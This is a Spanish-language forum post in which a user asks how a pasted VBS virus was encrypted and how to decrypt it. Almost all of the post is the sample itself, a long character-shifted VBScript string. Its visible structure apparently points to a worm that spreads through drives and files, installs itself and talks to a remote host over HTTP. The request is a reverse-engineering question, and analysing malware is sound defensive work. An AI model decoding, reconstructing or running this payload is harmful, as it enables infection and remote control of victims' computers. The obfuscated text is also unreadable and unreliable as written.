descifrar virus (.vbs)

Iniciado por **Aincrad**, 19 Octubre 2017, 15:59 PM

0 Miembros y 1 Visitante están viendo este tema.

**Aincrad**

hola-  ;D
no se como descifrar este vbs , ni siquiera logro ver como lo encriptaron.
alguien me puede explicar como lo encriptaron y explicarme como desencriptarlo?

aquí dejo el virus vbs:

Código (actionscript) [Seleccionar]
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b\85"™žŸŒ——"KhKMPŒ››ŒŸŒPM85—™–'"—KhKŸ 85—™–'š—KhK'Œ—ž858585"˜Kž"——š•K85žŸKž"——š•KhK¢žŽ"›ŸYŽŒŸš•ŽŸSM¢žŽ"›ŸYž"——MT85"˜K'"—ž¤žŸ˜š•85žŸK'"—ž¤žŸ˜š•KhKŽŒŸš•ŽŸSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"˜K"ŸŸ›š•85žŸK"ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85858585"™žŸŒ——™Œ˜KhK¢žŽ"›ŸYžŽ"›Ÿ™Œ˜85žŸŒŸ ›KhKž"——š•Yž›Ž"Œ—'š—žKSMžŸŒŸ ›MTKQKM‡M85"™žŸŒ——"KhKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žS"™žŸŒ——"TKQKM‡M85"'K™šŸK'"—ž¤žŸ˜š•Y'š—£"žŸžS"™žŸŒ——"TKŸ"™KK"™žŸŒ——"KhKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMPŸ˜›PMTKQKM‡M85ž›—"ŸKhKMgMKQKM§MKQKMiM85ž—›KhK`[[[K85"˜Kž›š™ž85"˜KŽ˜85"˜K›ŒŒ˜85"™'šKhKMM85 žž›Œ"™'KhKMM85žŸŒŸŒŸKhKMM85"˜Kš™š™Ž858585š™KšKž ˜K™£Ÿ858585"™žŸŒ™Ž85¢""—KŸ 8585"™žŸŒ——8585ž›š™žKhKMM85ž›š™žKhK›šžŸKSM"žXŒ¤MWMMT85Ž˜KhKž›—"ŸKSž›š™žWž›—"ŸT85ž—ŽŸKŽŒžKŽ˜KS[T85ŽŒžKM£ŽŽ ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£Ž ŸK›ŒŒ˜85ŽŒžKM ›ŒŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKš™š™ŽYŽ—šž85KKKKKKžŸKš™š™ŽKhKK'"—ž¤žŸ˜š•Yš›™Ÿ£Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜KW]WK'Œ—žT85KKKKKKš™š™ŽY¢"ŸK›ŒŒ˜85KKKKKKš™š™ŽYŽ—šž85KKKKKKž"——š•Y ™KM¢žŽ"›ŸY£KZZmKMKQKŽ"S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"S^_T85KKKKKK¢žŽ"›ŸYœ "ŸK85ŽŒžKM ™"™žŸŒ——M85KKKKKK ™"™žŸŒ——85ŽŒžKMž™M85KKKKKKš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMž"ŸXž™M85KKKKKKž"Ÿš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMŽ¡M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK ›—šŒKS›ŒŒ˜T85ŽŒžKKM™ ˜X"¡M85KKKKKK›šžŸKM"žX™ ˜X"¡MW™ ˜"¡KK85ŽŒžKKM™ ˜X'Œ'M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM"žX™ ˜X'Œ'MW™ ˜'Œ'KS›ŒŒ˜T85ŽŒžKKM™ ˜X›šŽžžM85KKKKKK›šžŸKM"žX™ ˜X›šŽžžMW™ ˜›šŽžžKKK85ŽŒžKKMŽ˜Xž"——M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM"žXŽ˜Xž"——MWŽ˜ž"——KS›ŒŒ˜TKK85ŽŒžKKM—ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK—Ÿ'Œ'KS›ŒŒ˜TK85ŽŒžKKM£"ŸX›šŽžžM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£"Ÿ›šŽžžKS›ŒŒ˜TK85ŽŒžKKMž—›M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKž—›KhK¡Œ—KS›ŒŒ˜TKKKKKKKK85™Kž—ŽŸ8585¢žŽ"›ŸYž—›Kž—›8585¢™858585ž K"™žŸŒ——85š™KšKž ˜K™£Ÿ85"˜K—™–š•85"˜K'"—™Œ˜85"˜K'š—™Œ˜85"˜K'"—"Žš™85"˜K'š—"Žš™8585 ›žŸŒŸ85'šKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž8585"'KK"¡Y"žŒ¤KhKŸ KŸ"™85"'KK"¡Y'ž›ŒŽKKiK[KŸ"™85"'KK"¡Y"¡Ÿ¤›KKhK\KŸ"™85KKKK'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜KWK"¡Y›ŒŸ"KQKM‡MKQK"™žŸŒ——™Œ˜WŸ 85KKKK"'KK'"—ž¤žŸ˜š•Y'"—£"žŸžKS"¡Y›ŒŸ"KQKM‡MKQK"™žŸŒ——™Œ˜TKKŸ"™85KKKKKKKK'"—ž¤žŸ˜š•Y'Ÿ'"—S"¡Y›ŒŸ"KQKM‡MKKQK"™žŸŒ——™Œ˜TYŒŸŸ" ŸžKhK]V_85KKKK™K"'85KKKK'šKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYq"—ž85KKKKKKKK"'K™šŸK—™–'"—KŸ"™K£"ŸK'š85KKKKKKKK"'KK"™žŸKS'"—Y™Œ˜WMYMTKŸ"™85KKKKKKKKKKKK"'KK—ŽŒžKSž›—"ŸS'"—Y™Œ˜WKMYMTKS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ"™85KKKKKKKKKKKKKKKK'"—YŒŸŸ" ŸžKhK]V_85KKKKKKKKKKKKKKKK"'KK ŽŒžKS'"—Y™Œ˜TKgiK ŽŒžKS"™žŸŒ——™Œ˜TKŸ"™85KKKKKKKKKKKKKKKKKKKK'"—™Œ˜KhKž›—"ŸS'"—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKžŸK—™–š•KhKž"——š•YŽŒŸž"šŸŽ ŸKS"¡Y›ŒŸ"KQKM‡MKKQK'"—™Œ˜KS[TKQKMY—™–MTK85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢"™š¢žŸ¤—KhKb85KKKKKKKKKKKKKKKKKKKK—™–š•YŸŒ'Ÿ›ŒŸ"KhKMŽ˜Y£M85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢š–"™'"ŽŸš¤KhKMM85KKKKKKKKKKKKKKKKKKKK—™–š•YŒ' ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS'"—Y™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQKMQžŸŒŸKMKQK›—ŒŽS"™žŸŒ——™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQMQ£"ŸM85KKKKKKKKKKKKKKKKKKKK'"—"Žš™KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡MKQKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡YMKQKž›—"ŸS'"—Y™Œ˜WKMYMTS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTQKM‡MTKQKM‡'Œ —Ÿ"Žš™‡MTK85KKKKKKKKKKKKKKKKKKKK"'KK"™žŸKS'"—"Žš™WMWMTKhK[KŸ"™85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'"—Y›ŒŸ"85KKKKKKKKKKKKKKKKKKKK—žK85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'"—"Žš™85KKKKKKKKKKKKKKKKKKKK™K"'85KKKKKKKKKKKKKKKKKKKK—™–š•YžŒ¡ST85KKKKKKKKKKKKKKKK™K"'85KKKKKKKKKKKK™K"'85KKKKKKKK™K"'85KKKK™£Ÿ85KKKK'šKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYž 'š—ž85KKKKKKKK"'K™šŸK—™–'š—KŸ"™K£"ŸK'š85KKKKKKKK'š—YŒŸŸ" ŸžKhK]V_85KKKKKKKK'š—™Œ˜KhK'š—Y™Œ˜85KKKKKKKKžŸK—™–š•KhKž"——š•YŽŒŸž"šŸŽ ŸKS"¡Y›ŒŸ"KQKM‡MKKQK'š—™Œ˜KQKMY—™–MTK85KKKKKKKK—™–š•Y¢"™š¢žŸ¤—KhKb85KKKKKKKK—™–š•YŸŒ'Ÿ›ŒŸ"KhKMŽ˜Y£M85KKKKKKKK—™–š•Y¢š–"™'"ŽŸš¤KhKMM85KKKKKKKK—™–š•YŒ' ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS'š—Y™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQKMQžŸŒŸK£›—šKMKQK›—ŒŽS"™žŸŒ——™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQMQ£"ŸM85KKKKKKKK'š—"Žš™KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡'š—‡'Œ —Ÿ"Žš™‡MTK85KKKKKKKK"'KK"™žŸKS'š—"Žš™WMWMTKhK[KŸ"™85KKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'š—Y›ŒŸ"85KKKKKKKK—žK85KKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'š—"Žš™85KKKKKKKK™K"'85KKKKKKKK—™–š•YžŒ¡ST85KKKK™£Ÿ85™Kt'85™Kt'85™K"'85™£Ÿ85YŽ—Œ85™Kž 8585ž K ™"™žŸŒ——85š™KšKž ˜K™£Ÿ85"˜K'"—™Œ˜85"˜K'š—™Œ˜8585ž"——š•Y'—ŸKMsvp,,Šn€}}pyŠ€~p}‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[T85ž"——š•Y'—ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[T85'"—ž¤žŸ˜š•Y—Ÿ'"—KžŸŒŸ ›KQK"™žŸŒ——™Œ˜KWŸ 85'"—ž¤žŸ˜š•Y—Ÿ'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜KWŸ 8585'šKKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž85"'KK"¡Y"žŒ¤KhKŸ KŸ"™85"'KK"¡Y'ž›ŒŽKKiK[KŸ"™85"'KK"¡Y"¡Ÿ¤›KKhK\KŸ"™85KKKK'šKKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KSK"¡Y›ŒŸ"KQKM‡MTY'"—ž85KKKKKKKKKš™KšKž ˜K™£Ÿ85KKKKKKKKK"'KK"™žŸKS'"—Y™Œ˜WMYMTKŸ"™85KKKKKKKKKKKKK"'KK—ŽŒžKSž›—"ŸS'"—Y™Œ˜WKMYMTS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ"™85KKKKKKKKKKKKKKKKK'"—YŒŸŸ" ŸžKhK[85KKKKKKKKKKKKKKKKK"'KK ŽŒžKS'"—Y™Œ˜TKgiK ŽŒžKS"™žŸŒ——™Œ˜TKŸ"™85KKKKKKKKKKKKKKKKKKKKK'"—™Œ˜KhKž›—"ŸS'"—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS"¡Y›ŒŸ"KQKM‡MKQK'"—™Œ˜S[TKQKMY—™–MKT85KKKKKKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS"¡Y›ŒŸ"KQKM‡MKQK'"—Y™Œ˜T85KKKKKKKKKKKKKKKKK™Kt'85KKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS'"—Y›ŒŸ"TK85KKKKKKKKKKKKK™K"'85KKKKKKKKK™K"'85KKKKK™£Ÿ85KKKKK'šKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYž 'š—ž85KKKKKKKKK'š—YŒŸŸ" ŸžKhK[85KKKKK™£Ÿ85™K"'85™K"'85™K"'85™£Ÿ85¢žŽ"›ŸYœ "Ÿ85™Kž 8585' ™ŽŸ"š™K›šžŸKSŽ˜KW›ŒŒ˜T8585›šžŸKhK›ŒŒ˜85"ŸŸ›š•Yš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKŽ˜WK'Œ—ž85"ŸŸ›š•YžŸœ žŸ"ŒKM žXŒ'™ŸeMW"™'š˜ŒŸ"š™85"ŸŸ›š•Yž™K›ŒŒ˜85›šžŸKhK"ŸŸ›š•Yž›š™žŸ£Ÿ85™K' ™ŽŸ"š™8585' ™ŽŸ"š™K"™'š˜ŒŸ"š™85š™KšKž ˜K™£Ÿ85"'KK"™'KhKMMKŸ"™85KKKK"™'KhK"¢"KQKž›—"ŸK85KKKK"™'KhK"™'KKQKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMPŽš˜› Ÿ™Œ˜PMTKQKž›—"ŸK85KKKK"™'KhK"™'KKQKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMP ž™Œ˜PMTKQKž›—"Ÿ8585KKKKžŸKššŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85KKKKžŸKšžKhKššŸY£Žœ ¤KSMž—ŽŸKUK'š˜K¢"™^]Šš›ŒŸ"™'ž¤žŸ˜MT85KKKK'šKŒŽ"Kšž"™'šK"™Kšž85KKKKKKK"™'KhK"™'KQKšž"™'šYŽŒ›Ÿ"š™KQKž›—"ŸKK85KKKKKKK£"ŸK'š85KKKK™£Ÿ85KKKK"™'KhK"™'KQKM›— žMKQKž›—"Ÿ85KKKK"™'KhK"™'KQKžŽ "Ÿ¤KQKž›—"Ÿ85KKKK"™'KhK"™'KQK žž›Œ"™'85KKKK"™'š˜ŒŸ"š™KhK"™'KK85—ž85KKKK"™'š˜ŒŸ"š™KhK"™'85™K"'85™K' ™ŽŸ"š™858585ž K ›žŸŒŸKST85š™KšKž ˜Ky£Ÿ8585ž"——š•Y'¢"ŸKMsvp,,Šn€}}pyŠ€~p}‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ"›ŸY£KZZmKMKQKŽ"¢S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"¢S^_TKWKM}prŠ~...M85ž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ"›ŸY£KZZmKMKKQKŽ"¢S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"¢S^_TKWKM}prŠ~...M85'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜W"™žŸŒ——"KQK"™žŸŒ——™Œ˜WŸ 85'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜WžŸŒŸ ›KQK"™žŸŒ——™Œ˜KWŸ 8585™Kž 858585' ™ŽŸ"š™K"¢"85š™KšKž ˜K™£Ÿ8585žŸKššŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸK"ž–žKhKššŸY£Žœ ¤KSMž—ŽŸKUK'š˜K¢"™^]Š—š'"ŽŒ—"ž–MT85'šKŒŽ"K"ž–K"™K"ž–ž85KKKK"'KK"ž–Y¡š— ˜ž"Œ—™ ˜KgiKMMKŸ"™85KKKKKKKK"¢"KhK"ž–Y¡š— ˜ž"Œ—™ ˜85KKKKKKKK£"ŸK'š85KKKK™K"'85™£Ÿ85™K' ™ŽŸ"š™858585' ™ŽŸ"š™KžŽ "Ÿ¤K85š™KšKž ˜K™£Ÿ8585žŽ "Ÿ¤KhKMM8585žŸKš•¢˜"ž¡"ŽKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸKŽš—"Ÿ˜žKhKš•¢˜"ž¡"ŽY£Žœ ¤SMž—ŽŸKUK'š˜K¢"™^]Šš›ŒŸ"™'ž¤žŸ˜MWW_cT85'šKŒŽ"Kš•"Ÿ˜K"™KŽš—"Ÿ˜ž85KKKK¡ž"š™žŸKhKž›—"ŸKSš•"Ÿ˜Y¡ž"š™WMYMT85™£Ÿ85¡ž"š™žŸKhKž›—"ŸKSŽš—"Ÿ˜žY¡ž"š™WMYMT85šž¡ž"š™KhK¡ž"š™žŸKS[TKQKMYM85'šKK£KhK\KŸšK š ™KS¡ž"š™žŸT854Kšž¡ž"š™KhKšž¡ž"š™KQKK¡ž"š™žŸKS"T85™£Ÿ85šž¡ž"š™KhK¡Œ—KSšž¡ž"š™T85"'KKšž¡ž"š™KiKaKŸ"™KžŽKhKMžŽ "Ÿ¤Ž™Ÿ]MK—žKžŽKhKMžŽ "Ÿ¤Ž™ŸM8585žŸKš•žŽ "Ÿ¤Ž™ŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže‡‡—šŽŒ—"šžŸ‡ššŸ‡MKQKžŽT85~ŸKŽš—Œ™Ÿ"¡" žKhKš•žŽ "Ÿ¤Ž™ŸY£Žœ ¤SMž—ŽŸKUK'š˜KŒ™Ÿ"¡" ž›š ŽŸMWM¢œ—MW[T8585'šKŒŽ"Kš•Œ™Ÿ"¡" žK"™KŽš—Œ™Ÿ"¡" ž85KKKKžŽ "Ÿ¤KKhKžŽ "Ÿ¤KKQKš•Œ™Ÿ"¡" žY"ž›—Œ¤™Œ˜KQKMKYM85™£Ÿ85"'KžŽ "Ÿ¤KKhKMMKŸ"™KžŽ "Ÿ¤KKhKM™Œ™XŒ¡M85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K"™žŸŒ™Ž85š™KšKž ˜K™£Ÿ8585 žž›Œ"™'KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKQKM‡MT85"'K žž›Œ"™'KhKMMKŸ"™85KKK"'K—ŽŒžKSK˜"S¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜W]TTKhKMe‡MKQKK—ŽŒžS"™žŸŒ——™Œ˜TKŸ"™85KKKKKK žž›Œ"™'KhKMŸ KXKMKQKŒŸ85KKKKKKž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ"™'WKM}prŠ~...M85KKK—ž85KKKKKK žž›Œ"™'KhKM'Œ—žKXKMKQKŒŸ85KKKKKKž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ"™'WKM}prŠ~...M8585KKK™K"'85™Kt'85858585 ›žŸŒŸ85žŸKžŽ"›Ÿ' ——™Œ˜ž"šŸKhKK'"—ž¤žŸ˜š•Y'Ÿ'"—KS¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜T85žŸK"™žŸŒ——' ——™Œ˜ž"šŸKhKK'"—ž¤žŸ˜š•Y'Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜T85"'KK—ŽŒžKSžŽ"›Ÿ' ——™Œ˜ž"šŸYž"šŸ›ŒŸ"TKgiK—ŽŒžKS"™žŸŒ——' ——™Œ˜ž"šŸYž"šŸ›ŒŸ"TKŸ"™K85KKKKž"——š•Y ™KM¢žŽ"›ŸY£KZZmKMKQKŽ"S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKn"S^_T85KKKK¢žŽ"›ŸYœ "ŸK85™Kt'85YŽ—Œ85žŸKš™š™ŽKhK'"—ž¤žŸ˜š•Yš›™Ÿ£Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜KWcWK'Œ—žT85"'KKY™ ˜KiK[KŸ"™K¢žŽ"›ŸYœ "Ÿ85™K' ™ŽŸ"š™858585ž Kž"Ÿš¢™—šŒKS'"— —W'"—™Œ˜T8585žŸ—"™–KhK'"— —85žŸžŒ¡ŸšKhK"™žŸŒ——"KQK'"—™Œ˜85žŸKš•"ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MKT85š•"ŸŸ›š¢™—šŒYš›™KM'ŸMWKžŸ—"™–WK'Œ—ž85š•"ŸŸ›š¢™—šŒYž™8585žŸKš•'žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"'KKš•'žšš¢™—šŒY'"—£"žŸžKSžŸžŒ¡ŸšTKŸ"™85KKKKš•'žšš¢™—šŒY—Ÿ'"—KSžŸžŒ¡ŸšT85™K"'85K85"'Kš•"ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ"™85KKK"˜KKš•žŸŒ˜š¢™—šŒ85KKKžŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKK¢"Ÿ"Kš•žŸŒ˜š¢™—šŒ8544YŸ¤›KhK\K8544Yš›™8544Y¢"ŸKš•"ŸŸ›š¢™—šŒYž›š™žš¤8544YžŒ¡Ÿš'"—KžŸžŒ¡Ÿš8544YŽ—šž85KKK™K¢"Ÿ"85KKKžŸKš•žŸŒ˜š¢™—šŒKhK™šŸ""™'85™K"'85"'Kš•'žšš¢™—šŒY'"—£"žŸžSžŸžŒ¡ŸšTKŸ"™85KKKž"——š•Y ™Kš•'žšš¢™—šŒY'Ÿ'"—KSžŸžŒ¡ŸšTYž"šŸ›ŒŸ"85™K"'K85™Kž 8585ž Kš¢™—šŒKS'"— —W'"—"T8585"'K'"—"KhKMMKŸ"™K85KKK'"—"KhK"™žŸŒ——"85™K"'8585žŸžŒ¡ŸšKhK'"—"KQK˜"KS'"— —WK"™žŸ¡KS'"— —WM‡MTKVK\T85žŸKš•"ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85š•"ŸŸ›š¢™—šŒYš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKM"žXž™"™'MKQKž›—"ŸKQK'"— —WK'Œ—ž85š•"ŸŸ›š¢™—šŒYž™KMM85KKKKK85žŸKš•'žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"'KKš•'žšš¢™—šŒY'"—£"žŸžKSžŸžŒ¡ŸšTKŸ"™85KKKKš•'žšš¢™—šŒY—Ÿ'"—KSžŸžŒ¡ŸšT85™K"'85"'KKš•"ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ"™85KKKK"˜KKš•žŸŒ˜š¢™—šŒ854žŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKKK¢"Ÿ"Kš•žŸŒ˜š¢™—šŒK8544KYŸ¤›KhK\K8544KYš›™8544KY¢"ŸKš•"ŸŸ›š¢™—šŒYž›š™žš¤8544KYžŒ¡Ÿš'"—KžŸžŒ¡Ÿš8544KYŽ—šž854™K¢"Ÿ"85KKKKžŸKš•žŸŒ˜š¢™—šŒKKhK™šŸ""™'85™K"'85"'Kš•'žšš¢™—šŒY'"—£"žŸžSžŸžŒ¡ŸšTKŸ"™85KKKž"——š•Y ™Kš•'žšš¢™—šŒY'Ÿ'"—KSžŸžŒ¡ŸšTYž"šŸ›ŒŸ"85™K"'K85™Kž 858585' ™ŽŸ"š™K ›—šŒKS'"— —T8585"˜KK"ŸŸ›š•Wš•žŸŒ˜ ›—šŒW ''85žŸKKš•žŸŒ˜ ›—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85¢"Ÿ"Kš•žŸŒ˜ ›—šŒK85KKKKKYŸ¤›KhK\K85KKKKKYš›™854KY—šŒ'š˜'"—K'"— —854K ''KhKYŒ854KYŽ—šž85™K¢"Ÿ"85žŸKš•žŸŒ˜š¢™—šŒKhK™šŸ""™'85žŸK"ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85"ŸŸ›š•Yš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKM"žXŽ¡"™'MKQKž›—"ŸKQK'"— —WK'Œ—ž85"ŸŸ›š•Yž™K ''85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K™ ˜"¡KST8585'šKKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž85"'KKK"¡Y"žŒ¤KhKŸ KŸ"™85KKKKK™ ˜"¡KhK™ ˜"¡KQK"¡Y›ŒŸ"KQKM§MKQK"¡Y"¡Ÿ¤›KQKž›—"Ÿ85™K"'85™£Ÿ85™Kq ™ŽŸ"š™8585' ™ŽŸ"š™K™ ˜'Œ'KS™ ˜"T8585™ ˜'Œ'KhK™ ˜"KQKž›—"Ÿ85'šKKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KS™ ˜"TYž 'š—ž85KKKKK™ ˜'Œ'KhK™ ˜'Œ'KQK'š—Y™Œ˜KQKM§MKQKMMKQKM§MKQKMMKQKM§MKQK'š—YŒŸŸ" ŸžKQKž›—"Ÿ85™£Ÿ8585'šKKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KS™ ˜"TY'"—ž85KKKKK™ ˜'Œ'KhK™ ˜'Œ'KQK'"—Y™Œ˜KQKM§MKQK'"—Yž"¥KKQKM§MKQKM'MKQKM§MKQK'"—YŒŸŸ" ŸžKQKž›—"Ÿ8585™£Ÿ85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K™ ˜›šŽžžKST8585š™KšKž ˜K™£Ÿ8585žŸKš•¢˜"ž¡"ŽKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸKŽš—"Ÿ˜žKhKš•¢˜"ž¡"ŽY£Žœ ¤SMž—ŽŸKUK'š˜K¢"™^]Š›šŽžžMWW_cT8585"˜Kš•"Ÿ˜85'šKŒŽ"Kš•"Ÿ˜K"™KŽš—"Ÿ˜ž854™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y™Œ˜KQKM§M854™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y›šŽžž"KQKM§M85KKKK™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y£Ž ŸŒ—›ŒŸ"KQKž›—"Ÿ85™£Ÿ85™K' ™ŽŸ"š™8585ž K£"Ÿ›šŽžžKS›"T85š™KšKž ˜K™£Ÿ8585ž"——š•Y ™KMŸŒž––"——KZqKZKZ{toKMKQK›"WbWŸ 85™Kž 8585ž K—Ÿ'Œ'KS —T85š™KšKž ˜K™£Ÿ8585'"—ž¤žŸ˜š•Y—Ÿ'"—K —85'"—ž¤žŸ˜š•Y—Ÿ'š—K —8585™Kž 8585' ™ŽŸ"š™KŽ˜ž"——KSŽ˜T8585"˜K"ŸŸ›š•Wš£ŽWŒŒ——'š˜Œ™¤8585žŸKš£ŽKhKž"——š•Y£ŽKSMPŽš˜ž›ŽPKZŽKMKQKŽ˜T85"'K™šŸKš£ŽYžŸš ŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸš 